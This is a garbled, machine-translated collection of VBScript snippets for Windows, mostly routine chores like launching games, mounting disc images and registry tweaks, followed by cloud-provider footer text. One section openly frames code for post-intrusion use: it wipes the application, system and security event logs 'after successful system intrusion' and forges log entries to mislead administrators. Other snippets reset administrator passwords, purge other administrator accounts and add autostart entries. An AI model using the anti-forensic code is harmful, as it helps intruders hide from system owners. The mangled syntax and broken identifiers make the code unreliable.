MSG = msgbox ("the registry has not been imported, and the game may not start. If you cannot enter the game, call the network administrator ~ ", 1," Something went wrong !! ")
Shell. Run "E: \ JIC \ o2jam.exe"
End if
Without Detection:
On Error resume next
Dim oshell, FSO
Set oshell = wscript. Createobject ("wscript. Shell ")
Set FSO = Createobject ("scripting. FileSystemObject ")
Oshell. Run "Regedit/s 9you. Reg"
Oshell. Run "D: \ online games \ music orchestra \ o2jam.exe"
Automatically loaded virtual optical drive:
Dim oshell
Set oshell = wscript. Createobject ("wscript. Shell ")
Oshell. Run "C: \ progra ~ 1 \ daemon ~ 1 \ daemon.exe-mount 0, D: \ LAN \ Battlefield 2 \ bf2cd1mini. MDs"
Wscript. Sleep 5000
Oshell. Run "D: \ LAN \ Battlefield 2 \ bf2.exe"
Another example:
Dim wsh, dmpath, isopath
Dmpath = "X: \ Y \ daemon.exe" 'sets the DM path
Isopath = "Z: \ monopoly 7 \ rich7b. MDs" 'sets the image file path
Set wsh = wscript. Createobject ("wscript. Shell ")
Wsh. Run CHR (34) & dmpath & CHR (34) & "-mount 0," & isopath, 0, true
Wscript. Sleep 3000 'it is best to delay a few seconds to wait for the image to be loaded 1000 = 1 second
Wsh. Run "Z: \ monopoly 7 \ rich7.exe"
Set wsh = nothing
Wscript. Quit
// Automatically import the registry andProgram
Option explicit
Dim folder
Folder = "D: \ AAA" 'set the folder to be executed
Dim wsh, FSO
Set wsh = wscript. Createobject ("wscript. Shell ")
Set FSO = Createobject ("scripting. FileSystemObject ")
Dim F, FC, F1, ext
Set F = FSO. getfolder (folder)
Set fc = f. Files
For each F1 in FC
EXT = lcase (FSO. getextensionname (F1 ))
Select case ext
Case "EXE"
Wsh. Run F1, true
Case "Reg"
Wsh. Run "Regedit/s" & F1, true
End select
Next
Set FSO = nothing
Set wsh = nothing
Wscript. Quit
// Exclude unnecessary files or folders from specified files or folders.
Option explicit
''' Indicates ''''''''''''
'Wangmeng-heihuo production, to friends in need.
The format of 'configuration file listfile. ini 'is as follows:
'What to delete (File | directory) = folder to be deleted = exclude 1; Exclude 2; Exclude 3 ............
'The configuration file can have multiple rows to operate on multiple directories.
'Behavior comment lines starting with '/' in the configuration file.
'Use semicolons (;) to separate multiple excluded content.
'Zookeeper configuration file example: zookeeper configuration file
'/Start with the configuration file
'Directory = D: \ = system volume information; online games; single-host games; games
'Directory = c: \ Program Files = QQ; WinRAR
'File = D: \ Network Game license file 1.exelicense file 2.exe
'/End of configuration file
''''''''''''
Dim FSO, listfile, objlistfile
Listfile = "" 'sets the configuration file path. If the configuration file and script are put together, keep them as they are.
If listfile = "" Then listfile = "listfile. ini"
Set FSO = Createobject ("scripting. FileSystemObject ")
On Error resume next
Set objlistfile = FSO. opentextfile (listfile, 1)
If err then
Err. Clear
Msgbox "configuration file not found" & listfile, 16, "error"
Wscript. Quit
End if
On Error goto 0
Dim flnum, fdnum, T1, T2, TM
Flnum = 0
Fdnum = 0
T1 = timer ()
Dim myline, linearr, listarr
Do While objlistfile. atendofstream <> true
Myline = lcase (replace (objlistfile. Readline, "=", "= "))
If left (myline, 1) = "/" then
'Objlistfile. skipline
Elseif checkline (myline) = 2 then
Linearr = Split (myline, "= ")
'Dofolder = linearr (1)
Listarr = Split (linearr (2 ),";")
'Msgbox linearr (0)
If linearr (0) = "directory" then delfolder linearr (1), listarr
If linearr (0) = "file" then delfile linearr (1), listarr
End if
Loop
T2 = timer ()
TM = CSTR (INT (t2-t1) * 10000) + 0.5)/10)
After msgbox is scanned, a total of "& fdnum &" directories and "& flnum &" files are deleted. "& Vbcrlf &" Time consumed "& TM &" millisecond ", 64," execution completed"
'The report does not need to be displayed. comment out the above line.
Set FSO = nothing
Wscript. Quit
Sub delfolder (folder, listarr)
Dim objfolder, subfolders, subfolder
Set objfolder = FSO. getfolder (folder)
Set subfolders = objfolder. subfolders
For each subfolder in subfolders
If not inarray (listarr, lcase (subfolder. Name) then
On Error resume next
Subfolder. Delete (true)
If err then
Err. Clear
Msgbox "Cannot delete directories. Please check" & subfolder, 16, "error"
Else
Fdnum = fdnum + 1
End if
On Error goto 0
End if
Next
End sub
Sub delfile (folder, listarr)
Dim objfolder, files, file
Set objfolder = FSO. getfolder (folder)
Set files = objfolder. Files
For each file in files
If not inarray (listarr, lcase (file. Name) then
On Error resume next
File. Delete (true)
If err then
Err. Clear
Msgbox "file cannot be deleted. Please check" & file, 16, "error"
Else
Flnum = flnum + 1
End if
On Error goto 0
End if
Next
End sub
Function checkline (strline)
Dim lineregexp, matches
Set lineregexp = new Regexp
Lineregexp. pattern = ". = ."
Lineregexp. Global = true
Set matches = lineregexp. Execute (strline)
Checkline = matches. Count
End Function
Function inarray (myarray, strin)
Dim strtemp
Inarray = true
For each strtemp in myarray
If strin = strtemp then
Exit Function
Exit
End if
Next
Inarray = false
End Function
! Obtain the path of a specific folder (for example, the actual location of the current user's desktop in the disk, and so on, equivalent to the shgetspecialfolderpath () function in VC)
Set wsshell = Createobject ("wscript. Shell ")
Export toppath = wsshell. specialfolders ("desktop ")
! Get current user name
Set wshnetwork = wscript. Createobject ("wscript. Network ")
Username = wshnetwork. Username
! Get the system variable % SystemRoot % (of course, other system variables can be analogous, but not all of them need to be transferred through process)
Set FSO = Createobject ("scripting. FileSystemObject ")
Set wshsysenv = wsshell. Environment ("process ")
Systemroot = wshsysenv ("WINDIR ")
! Add a domain user or lease to a local group
Set objgroup = GetObject ("winnt: //./administrators ")
Set objuser = GetObject ("winnt: // testnet/engineers ")
Objgroup. Add (objuser. adspath)
! Modify the local administrator password
Set objcnlar = GetObject ("winnt: //./administrator, user ")
Objcnla. setpassword "P @ ssw0rd"
Objcnla. setinfo
! The YES or NO dialog box is displayed.Code
Intanswer = msgbox ("Do you want to delete these files? ", Vbyesno," Delete Files ")
If intanswer = vbyes then
Msgbox "you answered yes ."
Else msgbox "you answered no ."
End if
! Run the CMD command line
Set obshell = wscript. Createobject ("wscript. Shell ")
Obshell. Run ("ipconfig"), true
If the command to be run contains double quotation marks, use & CHR (34) & instead
! Ignore code errors and continue execution
On Error resume next
Placed at the beginning of the Code. When the Code fails to run, it does not stop jumping out, but continues to execute the next one. Appropriate applications will be very effective.
! Crack download restrictions
Dim wsh
Set wsh = wscript. Createobject ("wscript. Shell ")
Wsh. Popup ("the function of this program is to solve the problem that cannot be downloaded ")
Wsh. Popup ("especially when the registry is disabled ")
Wsh. Popup ("made by Zeng Cheng ")
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion \ Internet Settings \ Zones \ 3 \ 1803", 0, "REG_DWORD"
Wsh. Popup ("Now you can download the program! ")
! Read the "computer name" of the Local Machine"
'Readcomputername. vbs
Dim readcomputername
Set readcomputername = wscript. Createobject ("wscript. Shell ")
Dim computername, regpath
Regpath = "HKLM \ System \ CurrentControlSet \ Control \ computername"
Computername = readcomputername. regread (regpath)
Msgbox ("computer name" & computername)
! Hide the arrow on the shortcut icon
'Den. vbs
Dim hiddenarrowicon
Set hiddenarrowicon = wscript. Createobject ("wscript. Shell ")
Dim regpath1, regpath2
Regpath1 = "hkcr \ lnkfile \ isw.cut"
Regpath2 = "hkcr \ piffile \ isshortcut"
Hiddenarrowicon. regdelete (regpath1)
Hiddenarrowicon. regdelete (regpath2)
! Modify the "Start" menu
'Changestartmenu. vbs
Dim changestartmenu
Set changestartmenu = wscript. Createobject ("wscript. Shell ")
Regpath = "hkcr \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \"
Type_name = "REG_DWORD"
Key_data = 1
Startmenu_run = "norun"
Startmenu_find = "nofind"
Startmenu_close = "noclose"
Sub change (argument)
Changestartmenu. regwrite regpath & argument, key_data, type_name
Msgbox ("success! ")
End sub
Call change (startmenu_run) 'disables the "run" function in the "Start" menu.
Call change (startmenu_find) 'disables the "Search" function in the "Start" menu
Call change (startmenu_close) 'Disable the system function in the Start Menu.
! Add a self-starting program to Windows
The program runs automatically at startup.
'Addautorunprogram. vbs
'Assume that the program is in the C: \ myfilefolder and the file name is autorun.exe.
Dim autorunprogram
Set autorunprogram = wscript. Createobject ("wscript. Shell ")
Regpath = "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \"
Type_name = "REG_SZ"
Key_name = "autorun"
Key_data = "C: \ myfile \ autorun.exe"
'The full path File Name of the self-starting Program
Autorunprogram. Write regpath & key_name, key_data, type_name
'Self-starting program autorun.exe In the Startup Group
Msgbox ("success! ")
1. Unlock the Registry Editor
Use NotePad to edit the following content:
Dim wsh
Set wsh = wscript. Createobject ("wscript. Shell ")'
Wsh. Popup ("unlock Registry Editor! ")
'The displayed information "unlock Registry Editor !"
Wsh. regwrite "hkcu \ Software \ Microsoft \ Windows \ CurrentVersion
\ Policies \ System \ disableregistrytools ", 0," REG_DWORD"
'Unlock the Registry Editor
Wsh. Popup ("Registry unlocked successfully! ")
'The pop-up message "Registry unlocked successfully!" is displayed !"
Save the file as a. vbs extension. Double-click it when using it.
2. Disable default share of Win NT/2000
Use NotePad to edit the following content:
Dim wshshell 'defines Variables
Set wshshell = Createobject ("wscript. Shell") 'creates an object wshshell that can communicate with the operating system.
Dim FSO, DC
Set FSO = Createobject ("scripting. FileSystemObject") 'create a file system object
Set Dc = FSO. Drives get all drive letters
For each d in DC
Dim Str
Wshshell. Run ("net share" & D. driveletter & "$/Delete") 'disable hidden sharing of All Drives
Next
Wshshell. Run ("net share ADMIN $/Delete ")
Wshshell. Run ("net share IPC $/Delete") 'disable ADMIN $ and IPC $ pipeline sharing
Now, run cmd.exe and run the net share command to view the shares on your machine. Double-click stopshare. vbs and the window will pop up. Then enter the net share command in cmd. No sharing list is found at this time.
3. display the local IP Address
In many cases, we need to know the IP address of the Local Machine. Although we can use various software, it is very convenient to use vbs scripts. Use NotePad to edit the following content:
Dim WS
Set Ws = Createobject ("mswinsock. Winsock ")
IPaddress = ws. localip
Msgbox "local IP =" & IPaddress
Save the preceding content as showip. vbs and double-click it to obtain the local IP address.
4. Use Script Programming to delete logs
After successful system intrusion, The first thing hackers do is to clear logs. If you remotely control the other machine on the GUI or log in from the terminal, deleting logs is not a difficult task, although logs are also run as a service, but unlike services such as HTTP and FTP, logs can be stopped and deleted in the command line, using net stop EventLog in the command line cannot be stopped, so some people think it is very difficult to delete the log in the command line. In fact, this is not the case, for example, the log can be deleted using the VMI in script programming, which is very simple and convenient.Source codeAs follows:
Strcomputer = "."
Set ob1_miservice = GetObject ("winmgmts :"_
& "{Impersonationlevel = impersonate, (Backup )}! \\"&_
Strcomputer & "\ Root \ cimv2 ")
Dim mylogs (3)
Mylogs (1) = "application"
Mylogs (2) = "system"
Mylogs (3) = "security"
For each logs in mylogs
Set collogfiles = obw.miservice. execquery _
("Select * From win32_nteventlogfile where logfilename = '" & logs &"'")
For each objlogfile in collogfiles
Objlogfile. cleareventlog ()
Next
Next
Save the above Code as the cleanevent. vbs file. In the above Code, first obtain the object, and then use its cleareventlog () method to delete the log. Create an array, application, security, and system. You can add an array if there are other logs. Then, a for loop is used to delete each element in the array, that is, each log.
5. Use scripts to forge logs
After deleting the log, any thoughtful administrator will immediately respond to the intrusion when facing the empty log, so a smart hacker will learn how to forge the log. Using the EventLog method in Script Programming to create logs is very simple. Please refer to the following code:
Set Ws = wscript. Createobject ("wscript. Shell ")
WS. logevent 0, "Write log success" 'create a successful execution log
Save the above Code as createlog. vbs. This code is easy to understand. first obtain a shell object of wscript, and then use the logevent method of the shell object. Logevent usage: logevent eventtype, "Description" [, remote system], where eventtype is the log type. The following parameters can be used: 0 indicates successful execution, 1 indicates an execution error, 2 indicates a warning, 4 Information, 8 successful audits, 16 fault audits. So in the code above, change 0 to 1, 2, 4, 8, 16. The content in the quotation marks is the log description. One disadvantage of using this method to write logs is that the logs can only be written to application logs, and the log source can only be wsh, that is, Windows Scripting host. Therefore, it cannot be concealed, this is for your reference only.
6. Disable the Start menu option
Use NotePad to edit the following content:
Dim changestartmenu
Set changestartmenu = wscript. Createobject ("wscript. Shell ")
Regpath = "hkcr \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \"
Type_name = "REG_DWORD"
Key_data = 1
Startmenu_run = "norun"
Startmenu_find = "nofind"
Startmenu_close = "noclose"
Sub change (argument)
Changestartmenu. regwrite regpath & argument, key_data, type_name
Msgbox ("success! ")
End sub
Call change (startmenu_run) 'disables the "run" function in the "Start" menu.
Call change (startmenu_find) 'disables the "Search" function in the "Start" menu
Call change (startmenu_close) 'Disable the system function in the Start Menu.
Save the above Code as the changestartmenu. vbs file. Double-click it when using it.
7. Execute external programs
Use NotePad to edit the following content:
Dim objshell
Set objshell = wscript. Createobject ("wscript. Shell ")
Ireturn = objshell. Run ("cmd.exe/C set Var = World", 1, true)
Save it as a. vbs file. In this Code, we first set an environment variable named "var" and" world". Users can replace "cmdcomspecizer" with "cmd.exe" and change the command "set Var = World" to other commands to run arbitrary commands.
8. Restart the specified IIS service
Use NotePad to edit the following content:
Const ads_service_stopped = 1
Set objcomputer = GetObject ("winnt: // mycomputer, computer ")
Set objservice = objcomputer. GetObject ("service", "myservice ")
If (objservice. Status = ads_service_stopped) then
Objservice. Start
End if
// Check the signature in the specific file in the searchobject and add the result to result.txt.
Set objnetwork = Createobject ("wscript. Network ")
Strcomputer = objnetwork. computername
Const forreading = 1
Const forappending = 8
Dim arrfilelines ()
I = 0
Set ob1_miservice = GetObject ("winmgmts:" & "{impersonationlevel = impersonate }! \ "& Strcomputer &"
Ootcimv2 ")
Set colfiles = obw.miservice. execquery ("select * From cim_datafile where Path = '\ Search \'")
For each objfile in colfiles
If objfile. Extension = "log" then
Filename = objfile. Name
Wscript. Echo filename
End if
Next
Set objfso = Createobject ("scripting. FileSystemObject ")
Set objfile = objfso. opentextfile ("input.txt", forreading)
Inputline = objfile. Readline
Objfile. Close
Set objfile = objfso. opentextfile (filename, forreading)
Do until objfile. atendofstream
Searchline = objfile. Readline
If instr (searchline, inputline) = 0 then
Else
Redim preserve arrfilelines (I)
Arrfilelines (I) = searchline
I = I + 1
End if
Loop
Objfile. Close
Set objfile = objfso. opentextfile ("result.txt", forappending)
For l = ubound (arrfilelines) to lbound (arrfilelines) step-1
Objfile. writeline arrfilelines (l)
Next
Objfile. Close
// Clear all administrator accounts when logging on to the user. Only Administrator and netshowservices are retained, and the administrator password is changed to 55555555.
Set objnetwork = Createobject ("wscript. Network ")
Strcomputer = objnetwork. computername
Struser = objnetwork. Name
Strstat = "false"
Set colgroups = GetObject ("winnt: //" & strcomputer &"")
Colgroups. Filter = array ("group ")
For each objgroup in colgroups
For each objuser in objgroup. Members
If objuser. Name = struser then
If objgroup. Name = "aadministrators" then
Strstat = "true"
End if
End if
Next
Next
Set objgroup = GetObject ("winnt: //" & strcomputer & "/administrators ")
For each objuser in objgroup. Members
If objuser. Name = "Administrator" or objuser. Name = "netshowservices" then
If objuser. Name = "Administrator" and strstat = "true" then
Objuser. setpassword "55555555"
End if
Else
Objgroup. Remove (objuser. adspath)
End if
Next
// Use scripts and batch processing to clear computer traces
This function uses two files: The vbs script file Reg. vbs (you can customize the file name) and the batch file Reg. BAT (you can customize the file name ).
1. The vbs script file is as follows:
Dim wshshell
Set wshshell = wscript. Createobject ("wscript. Shell ")
Wshshell. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Reg", "Reg. vbs"
Wshshell. regwrite "HKLM \ Software \ Microsoft \ Windows \ CurrentVersion \ runonce \ deldel", "Reg. Bat"
Wshshell. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ main \ Start page", "about: blank"
Wshshell. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ typedurls \",""
Wshshell. regdelete "hkcu \ Software \ Microsoft \ Internet Explorer \ typedurls \"
Wshshell. regwrite "hkcu \ Software \ Microsoft \ Internet Explorer \ typedurls \",""
Wshshell. regwrite "hkcu \ Software \ 3721 \ inputcns \",""
Wshshell. regdelete "hkcu \ Software \ 3721 \ inputcns \"
Wshshell. regwrite "hkcu \ Software \ 3721 \ inputcns \",""
The first two behaviors of this script define variables. Please write them as follows. Starting from the third line, it is the processing of the Registry. Rows 3 and 4 Add a process file automatically run when the computer is started in the registry. One is that the script itself is Reg. vbs, and the other is the reg. bat batch file. The fifth act restores the IE start page to "about: blank"; the sixth, seventh, and eighth actions clear the web address names that have been browsed in the address bar of the IE browser; actions 9, 10, and 11 Clear the real name of the network in the IE Address Bar.
2. the batch file is as follows:
@ Deltree-y c: \ windows \ temp \*.*
@ Deltree-y c: \ windows \ "Temporary Internet Files "\*.*
@ Deltree-y c: \ windows \ history \*.*
@ Deltree-y c: \ windows \ recent \*.*
@ Deltree-y c: \ recycled \*.*
@ Deltree-y c: \ windows \ cookies \*.*
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
